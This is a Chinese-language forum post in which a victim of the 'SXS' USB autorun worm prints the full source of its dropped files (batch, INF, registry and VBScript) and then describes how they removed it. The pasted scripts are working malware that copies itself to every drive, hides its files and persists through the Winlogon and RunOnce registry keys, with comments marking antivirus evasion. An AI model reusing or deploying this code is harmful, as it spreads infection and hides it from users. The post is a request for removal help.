今天遇到一个病毒 姑且叫他 SXS病毒
　　
　　首先杀掉怀疑进程 再删注册表项(查找WScript.exe\sxs.exe 全部删除) 再删文件 重启 病毒重新出现.
　　不知道我漏删了什么.
　　下面是每个盘生成的四个文件.
　　autorun.bat 文件
　　
　　@echo off
　　if exist .\autorun.reg regedit /s .\autorun.reg
　　if not "%1"=="" goto open
　　if exist autorun.vbs start WScript.exe autorun.vbs&exit
　　
　　';免杀
　　if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
　　';免杀
　　
　　
　　
　　
　　
　　:open
　　if not "%1"=="Open" goto next
　　start explorer .\
　　exit
　　:next
　　if not "%1"=="Over" goto :next2
　　exit
　　:next2
　　if "%1"=="-" attrib -s -a -h -r %2\autorun.*
　　if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
　　if "%1"=="+" attrib +s +a +h +r %2\autorun.*
　　if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
　　:end
　　
　　
　　AutoRun.inf 文件
　　
　　[autorun]
　　shell\open=打开(&O)
　　shell\open\Command=WScript.exe .\autorun.vbs
　　shell\open\Default=1
　　shell\explore=资源管理器(&X)
　　shell\explore\Command=WScript.exe .\autorun.vbs
　　
　　open=RavMon.exe
　　shellEXEcute=RavMon.exe
　　shell\Auto\command=RavMon.exe
　　
　　
　　
　　autorun.reg 文件
　　
　　
　　Windows Registry Editor Version 5.00
　　
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
　　"Userinit"="userinit.exe,autorun.bat"
　　
　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
　　"autorun"="sxs.exe"
　　
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
　　"ShowSuperHidden"=dword:00000000
　　"Hidden"=dword:00000002
　　
　　
　　autorun.vbs 文件
　　on error resume next
　　Set WshShell =CreateObject("WScript.Shell")
　　
　　if 1=0 then
　　else
　　For i=1 to 1
　　set Of = CreateObject("Scripting.FileSystemObject")
　　set dir = Of.GetSpecialFolder(1)
　　
　　Set dc = Of.Drives
　　if WScript.ScriptFullName=dir&"\autorun.vbs" then
　　isdir=true
　　else
　　a=WshShell.Run("autorun.bat Open" ,0,False)
　　isdir=false
　　end if
　　For Each d In dc
　　If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
　　a=WshShell.Run("autorun.bat - "&d ,0,True)
　　if isdir then
　　Of.CopyFile dir&"\autorun.bat",d&"\",True
　　Of.CopyFile dir&"\sxs.exe",d&"\",True
　　Of.CopyFile dir&"\autorun.inf",d&"\",True
　　Of.CopyFile dir&"\autorun.reg",d&"\",True
　　Of.CopyFile dir&"\autorun.vbs",d&"\",True
　　else
　　Of.CopyFile "autorun.bat",d&"\",True
　　Of.CopyFile "sxs.exe",d&"\",True
　　Of.CopyFile "autorun.inf",d&"\",True
　　Of.CopyFile "autorun.reg",d&"\",True
　　Of.CopyFile "autorun.vbs",d&"\",True
　　end if
　　a=WshShell.Run("autorun.bat + "&d ,0,True)
　　End If
　　next
　　if isdir then
　　wscript.sleep 60000
　　i=0
　　else
　　a=WshShell.Run("autorun.bat - "&dir ,0,True)
　　Of.CopyFile "autorun.bat",dir&"\",True
　　Of.CopyFile "sxs.exe",dir&"\",True
　　Of.CopyFile "autorun.inf",dir&"\",True
　　Of.CopyFile "autorun.reg",dir&"\",True
　　Of.CopyFile "autorun.vbs",dir&"\",True
　　a=WshShell.Run("autorun.bat + "&dir ,0,True)
　　End if
　　next
　　End if

我被这个东西整不行了。谁救救我吧~

病毒不运行时勾去显示隐藏文件有作用，但是一打开盘符（用右键点打开）或运行资源管理器，马上就取消显示隐藏文件。并且不显示受保护的系统文件。
冰刃分析进程我分析一晚上嫩没找到。
。。。。救命啊~我看最近网上好像这个也挺泛滥的。。。
帮忙出个主意。。。

我已经用文件粉碎器消灭了它。
不容易啊。
提醒其他中的XDJM，先关闭那个该死的W进程。用文件粉碎器！然后配合SRENG把启动项注册表给修复。
再用卡卡把启动项里的AUTORUN去掉。。。
哈哈！我太聪明了！

哪位大大整个这个东西的免疫文件。我怕下次运气不好，弄 不掉了。。